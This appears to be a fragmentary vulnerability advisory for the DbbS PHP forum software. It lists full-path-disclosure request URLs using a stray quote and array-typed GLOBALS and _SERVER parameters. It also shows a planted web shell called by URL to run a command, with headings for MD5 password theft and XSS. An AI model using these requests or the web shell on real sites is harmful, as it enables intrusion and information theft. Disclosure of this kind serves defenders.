Special thanks to rgod for his help!!!
Full path disclosure
http://www.site.com/DbbS/topics.php?fcategoryid='
http://www.site.com/DbbS/script.php?unavariabile[]=
http://www.site.com/DbbS/script.php?GLOBALS[]=
http://www.site.com/DbbS/script.php?_SERVER[]=
MD5 Password
Create shell
Launch a command
http://www.site.com/DbbS/suntzu.php?cmd=dir
XSS
by rgod and yamcho